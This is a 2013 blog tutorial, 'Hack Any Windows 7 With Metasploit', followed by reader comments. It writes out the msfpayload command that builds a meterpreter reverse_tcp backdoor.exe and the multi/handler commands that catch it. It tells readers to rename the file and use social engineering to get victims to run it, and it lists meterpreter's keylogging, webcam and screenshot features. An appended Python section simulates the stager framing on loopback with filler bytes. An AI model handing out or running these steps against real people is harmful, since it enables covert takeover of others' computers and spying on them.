
Wednesday 5 June 2013

Hack Any Windows 7 With Metasploit


In this tutorial I will compromise a Windows 7 SP1 machine using Metasploit. Strictly speaking, this does not exploit a vulnerability in Windows 7: the victim is tricked into running a payload we hand them, and Metasploit only catches the connection that payload makes back to us. For that I will be using the exploit/multi/handler module, which "provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework".

Before we fire up Metasploit, we need to create a payload that will give us a meterpreter shell. To create the payload, type this in the terminal, substituting your own values for the two placeholders:


msfpayload windows/meterpreter/reverse_tcp LHOST=<your local IP> LPORT=<listening port> X > /root/backdoor.exe





The trailing X tells msfpayload to emit a Windows executable rather than raw shellcode (msfpayload has since been retired in favour of msfvenom, which takes the same payload name and options). I used port 4444 for LPORT, the port the handler will listen on; you can choose your own. LHOST is the address the payload connects back to, so it must be the IP of the attacking machine that will run the handler, not the victim's IP, and it must be reachable from the victim. On my local network that is 192.168.10.5; if the victim is on another network you need an address it can route to, such as your public IP with the port forwarded.










After that, you should see a file named backdoor.exe in /root. Deliver it to the victim using your social engineering skills and get them to run it. You can rename the file so that it is less obvious. Note that the handler below must already be listening when the victim runs the file; otherwise the connection back is simply refused and you get nothing.

Launch Metasploit and set up the handler by typing these commands in msfconsole. The payload, LHOST and LPORT must match exactly what you used when generating backdoor.exe:



use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.5
set lport 4444
exploit





If all goes well, a meterpreter session opens. Type sysinfo to gather some information about the machine, and help to list the other meterpreter commands, which include taking a screenshot of the desktop, recording keystrokes and capturing a snapshot from the webcam. To drop into the machine's command shell, type shell.
It is quite something to grab the victim's screen with the meterpreter command screenshot.
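What actually happens on the wire when the victim runs backdoor.exe and the handler answers, as an added example that is not part of the original post and not Metasploit's own code: a Python simulation of both sides on loopback. The "stage" here is constructed filler bytes, not a real meterpreter stage, and the hypothetical function names are mine. The framing is the one the windows reverse_tcp stager expects: the handler sends a 4-byte little-endian length, then the stage, and the stager reads exactly that many bytes before it would jump into them. The same script shows what "handler failed to bind / address already in use" means: while one handler is listening on LPORT, nothing else can bind that port.

```python
import socket
import struct
import threading

# Constructed stand-in for the meterpreter stage (the metsrv DLL). Not real code,
# just recognisable filler that is larger than a single TCP segment.
FAKE_STAGE = bytes(range(256)) * 300 + b"<end-of-stage>"


def recv_exact(sock, n):
    """Read exactly n bytes or raise. The real stager does the same with a recv()
    loop, because one recv() call may return fewer bytes than requested."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf.extend(chunk)
    return bytes(buf)


def serve_one_stager(listener, stage, log):
    """Handler side (hypothetical stand-in for multi/handler): accept one
    connection, send the 4-byte little-endian stage length, then the stage.
    multi/handler prints 'Sending stage (N bytes) to <peer>' at this point."""
    conn, peer = listener.accept()
    with conn:
        log.append(f"Sending stage ({len(stage)} bytes) to {peer[0]}")
        conn.sendall(struct.pack("<I", len(stage)))
        conn.sendall(stage)


def stager_connect_back(lhost, lport):
    """Stager side: connect back to LHOST:LPORT, read the 4-byte length, then
    read the stage. The real stager executes the buffer; this returns it."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        (length,) = struct.unpack("<I", recv_exact(s, 4))
        return recv_exact(s, length)


def port_is_bindable(host, port):
    """True if a new handler could bind host:port right now. A False here is the
    'handler failed to bind ... address already in use' situation: an earlier
    handler, or some other program, still owns the port."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.bind((host, port))
        return True
    except OSError:
        return False
    finally:
        probe.close()


def simulate(stage=FAKE_STAGE, lhost="127.0.0.1"):
    """Run handler and stager on loopback. LPORT 0 lets the OS pick a free port,
    so the demo never collides with a real handler on 4444."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((lhost, 0))
    listener.listen(1)
    lport = listener.getsockname()[1]
    log = []
    t = threading.Thread(target=serve_one_stager, args=(listener, stage, log))
    t.start()
    try:
        bind_while_listening = port_is_bindable(lhost, lport)  # second handler on same LPORT
        received = stager_connect_back(lhost, lport)
    finally:
        t.join(timeout=5)
        listener.close()
    return {
        "lport": lport,
        "sent_len": len(stage),
        "length_prefix": struct.pack("<I", len(stage)),
        "received": received,
        "bind_while_listening": bind_while_listening,
        "handler_log": log,
    }


if __name__ == "__main__":
    r = simulate()
    print(r["handler_log"][0])
    print("stage intact:", r["received"] == FAKE_STAGE)
    print("could a second handler bind the same LPORT:", r["bind_while_listening"])
```

The length prefix is why the handler's "Sending stage (N bytes)" line is worth reading: N is the size the stager is about to allocate and receive. If the session never opens after that line, the stage was sent but the payload did not run, which is usually an architecture or antivirus problem on the victim rather than a networking one.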

6 comments:

  1. How do you know the port number which you have used as 4444?
  2. I am new to this. I am interested in learning hacking using Kali Linux. I got Kali from my friend. Can you help me with this and give me some tips to develop my knowledge?
  3. I have successfully attacked a system using the metasploit payload attack (both are my systems). After rebooting the system I am unable to attack the same system using the previous lhost and lport.
    It says "handler failed to bind <1st attempted lhost>"
    address already in use
  4. What is this rubbish, you bastards
    msfpayload windows/meterpreter/reverse_tcp LHOST=<your local IP> LPORT=<listening port> X > /root/backdoor.exe
    You bastards, the victim's IP? Screw your victim's IP and the hacker's IP too, backdoor.exe/enter/yourhackbook/screw/it
    hacked :D hacked by lun exploit tutorial
  5. ....exe is not a valid Win32 application, please, how do I fix it?
  6. We will be getting a reverse TCP connection from the victim machine by using a small backdoor windows 7 exploit metasploit.
